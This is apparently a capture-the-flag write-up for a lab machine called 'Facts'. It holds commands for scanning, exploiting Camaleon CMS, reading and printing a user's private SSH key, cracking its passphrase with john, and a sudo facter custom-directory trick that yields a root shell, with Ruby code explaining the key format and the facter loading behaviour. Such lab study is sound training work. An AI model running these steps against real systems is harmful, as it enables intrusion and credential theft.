Facts
Information Gathering
> nmap 10.129.22.202 -sCV -p- --open
- 22 SSH: requires valid credentials, so nothing to do here until we find some.
- 80 HTTP: hosts a simple website with facts to read.
- 54321 HTTP: redirects to port 9001.
Exploitation
- By walking the site, we find an admin login page by reading the page source.
- From there we are able to create a new admin account.
- This new account doesn’t have full privileges.
- However, we see that it is running Camaleon CMS version 2.9.0.
- This version has a mass-assignment vulnerability that allows privilege escalation:
- CVE-2025-2304
- We can use this proof of concept: https://github.com/d3vn0mi/cve-2025-2304-poc
- Using the exploit, we get access to the admin panel.
- The site runs on Ruby (Camaleon CMS is a Rails application), so uploading a file to get a Ruby reverse shell looks possible as well with more time.
- Instead, another CVE in the CMS gives us file inclusion.
- With that exploit we read /home/trivia/.ssh/id_ed25519, which gives us the user's private SSH key:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBBjiZADO
dtctyuCfPvlK6JAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIBGGQJW4pNnMqYSI
CpzP1BZ+GsR5Sox+8tBAIsX2Ev9RAAAAoI3/9swkZHFRnU1w+ylzRNebxOWg5T+9HRDi/s
PFWehTZVCrG8AliD7+Sfdal2IMDeR4Y7gyJRtWHOfuCnbXvFy0nIbEENRGBBs6mpMp6Gp8
HrRnw5L1fzdbEREr4AKUrDEijp2sUAt1ybzj0WQclSXPOSEwDk+OSj5Z1P2CeYKKIPrLKz
Swqe9ptBowCkgZ3WFJeX2uStN2YSXcytaClwo=
-----END OPENSSH PRIVATE KEY-----
The key is passphrase-protected (the header shows aes256-ctr with the bcrypt KDF), so we crack the passphrase:
- Convert the key into a john hash:
ssh2john trivia_private_key > trivia_ssh
where trivia_private_key is a file holding the key above and trivia_ssh is the output of ssh2john.
- Run john against it:
john --wordlist=/usr/share/wordlists/rockyou.txt trivia_ssh
The resulting passphrase for trivia's key: dragonballz – nice
- ssh refuses a key file whose permissions are too open, so tighten them first:
chmod 600 trivia_private_key
- Then connect to the server with the key, entering the cracked passphrase when prompted:
ssh -i trivia_private_key trivia@10.129.22.202
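Before spending time on john it is worth confirming what kind of cracking job this is: the openssh-key-v1 container keeps the cipher name, KDF name, salt and round count in the clear ahead of the encrypted private section, and that header is exactly what ssh2john turns into a hash. The following is an added example, not part of the original writeup and not code from ssh2john or OpenSSH; it parses the key printed above (embedded here as its base64 body) with the Ruby standard library only. The function and constant names are my own.

```ruby
require 'base64'

# Base64 body of the key printed above, with the BEGIN/END armour lines removed.
KEY_B64 = <<~B64
  b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBBjiZADO
  dtctyuCfPvlK6JAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIBGGQJW4pNnMqYSI
  CpzP1BZ+GsR5Sox+8tBAIsX2Ev9RAAAAoI3/9swkZHFRnU1w+ylzRNebxOWg5T+9HRDi/s
  PFWehTZVCrG8AliD7+Sfdal2IMDeR4Y7gyJRtWHOfuCnbXvFy0nIbEENRGBBs6mpMp6Gp8
  HrRnw5L1fzdbEREr4AKUrDEijp2sUAt1ybzj0WQclSXPOSEwDk+OSj5Z1P2CeYKKIPrLKz
  Swqe9ptBowCkgZ3WFJeX2uStN2YSXcytaClwo=
B64

# Reads one SSH "string" (4-byte big-endian length, then that many bytes)
# starting at off. Returns the bytes and the offset just past them.
def ssh_string(buf, off)
  len = buf[off, 4].unpack1('N')
  [buf[off + 4, len], off + 4 + len]
end

# Parses the openssh-key-v1 container. Everything before the private section
# is plaintext: cipher, KDF, KDF options (salt + rounds for bcrypt), key count
# and the public key. Only the final blob is encrypted with the passphrase.
def parse_openssh_key(b64)
  raw = Base64.decode64(b64) # decode64 skips the newlines in the heredoc
  magic = "openssh-key-v1\0".b
  raise 'not an openssh-key-v1 blob' unless raw.start_with?(magic)

  off = magic.bytesize
  cipher, off  = ssh_string(raw, off)
  kdf, off     = ssh_string(raw, off)
  kdfopts, off = ssh_string(raw, off)
  nkeys = raw[off, 4].unpack1('N')
  off += 4
  pub, off = ssh_string(raw, off)
  priv, _  = ssh_string(raw, off)
  keytype, _ = ssh_string(pub, 0)

  info = {
    cipher: cipher, kdf: kdf, nkeys: nkeys, keytype: keytype,
    encrypted: cipher != 'none',        # "none" means no passphrase at all
    private_blob_len: priv.bytesize     # multiple of the cipher block size
  }
  if kdf == 'bcrypt'
    salt, o = ssh_string(kdfopts, 0)
    info[:salt_hex] = salt.unpack1('H*')
    info[:rounds]   = kdfopts[o, 4].unpack1('N') # bcrypt_pbkdf work factor
  end
  info
end

if $PROGRAM_NAME == __FILE__
  parse_openssh_key(KEY_B64).each { |k, v| puts "#{k}: #{v}" }
end
```

If cipher comes back as "none" the key is usable as-is and john is a waste of time; if it is bcrypt, the rounds value is the per-guess cost you are paying, which is why a wordlist attack is the realistic option rather than brute force.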
Privilege Escalation
- Put linpeas.sh on the target (the key passphrase is needed again):
scp -i htb/facts/trivia_private_key ~/linpeas.sh trivia@10.129.22.202:~/linpeas.sh
- linpeas reports:
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter
- We can confirm this with
sudo -l
facter is a command-line tool that gathers facts about nodes (systems) such as hardware details, network settings, OS type and version, and more. These facts are made available as variables in your Puppet manifests and can be used to inform conditional expressions in Puppet.
- Given that the name of the box is “facts” we can assume that this is the correct attack vector for PE. Again on the github page:
Resolvers have the role of gathering data from the system. For example a resolver can execute a command on the system, can read a file or any operation that retrieves some data from a single source on the system.
So, given that we can run facter with sudo, maybe we can execute a command on the system through facter.
- To do this, it looks like we use setcode inside a custom fact: https://help.puppet.com/core/current/Content/PuppetCore/executing_shell_commands_in_facts.htm
- From that page: to get the output of uname --hardware-platform to single out a specific type of workstation, you create a custom fact. To run a command and use the output verbatim as your fact's value, you can pass the command into setcode directly. For example:
setcode 'uname --hardware-platform'
I was unable to get facter to run a custom fact in the aforementioned way. Instead, GTFOBins lists a Ruby shell for facter: create a .rb file in /tmp and point facter at that directory by running sudo facter --custom-dir /tmp shell.rb.
This gives us our root shell.
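Why both the setcode route and the GTFOBins route end in code execution, as an added example that is not part of the original writeup and is not Facter's own code: the module below is a minimal stand-in for the two calls a custom fact uses (Facter.add and setcode) and for the one loader behaviour that matters here, namely that every .rb file in the custom directory is load-ed, so its top-level Ruby runs regardless of which fact name is passed on the command line. The fact names, file names, the marker file and the temporary directory are my own choices; a real payload would be exec("/bin/sh") where the marker is written.

```ruby
require 'tmpdir'

# Stand-in for the slice of Facter's custom-fact API that a --custom-dir file
# touches. Not Facter's code; simplified (the real tool resolves facts lazily,
# this resolves them as soon as they are added).
module Facter
  @facts = {}

  class Resolution
    attr_reader :value

    # setcode with a String runs it as a shell command and takes the output
    # as the fact's value; with a block it uses the block's return value.
    def setcode(cmd = nil, &blk)
      @value = cmd ? `#{cmd}`.chomp : blk.call
    end
  end

  # Facter.add evaluates the block in the context of a resolution, which is
  # what makes a bare `setcode ...` inside the block work.
  def self.add(name, &blk)
    r = Resolution.new
    r.instance_eval(&blk)
    @facts[name.to_s] = r.value
  end

  # What --custom-dir amounts to: each *.rb in the directory is load-ed, so all
  # of its top-level Ruby executes in the facter process (root under sudo).
  def self.load_custom_dir(dir)
    Dir.glob(File.join(dir, '*.rb')).sort.each { |f| load f }
    @facts
  end
end

# Writes the two payload styles discussed above into dir and returns dir.
def write_custom_facts(dir)
  File.write(File.join(dir, 'uid.rb'), <<~'RB')
    # Style 1: a proper custom fact whose value is a command's output.
    Facter.add(:uid_via_setcode) do
      setcode 'id -u'
    end
  RB
  File.write(File.join(dir, 'shell.rb'), <<~RB)
    # Style 2 (the GTFOBins shape): runs at load time, before any fact is
    # resolved. A real payload would be exec("/bin/sh"); this one records the
    # uid it ran under so the effect is observable.
    File.write(#{File.join(dir, 'top_level_ran').inspect}, Process.uid.to_s)
  RB
  dir
end

# Drops both files in a fresh temp dir, loads the directory the way facter
# would, and returns what each style produced.
def demo_custom_dir
  dir = Dir.mktmpdir('facts')
  write_custom_facts(dir)
  facts = Facter.load_custom_dir(dir)
  marker = File.read(File.join(dir, 'top_level_ran'))
  { dir: dir, facts: facts, top_level_uid: marker.to_i }
end

if $PROGRAM_NAME == __FILE__
  r = demo_custom_dir
  puts "uid_via_setcode fact: #{r[:facts]['uid_via_setcode']}"
  puts "top-level code ran as uid #{r[:top_level_uid]}"
end
```

On the target the same two files dropped in /tmp and `sudo facter --custom-dir=/tmp uid_via_setcode` run both as root, which is why the fact name on the command line barely matters: the shell.rb payload has already executed by the time facter looks for the requested fact. GTFOBins' recipe is style 2 with exec("/bin/sh") as the file's only line.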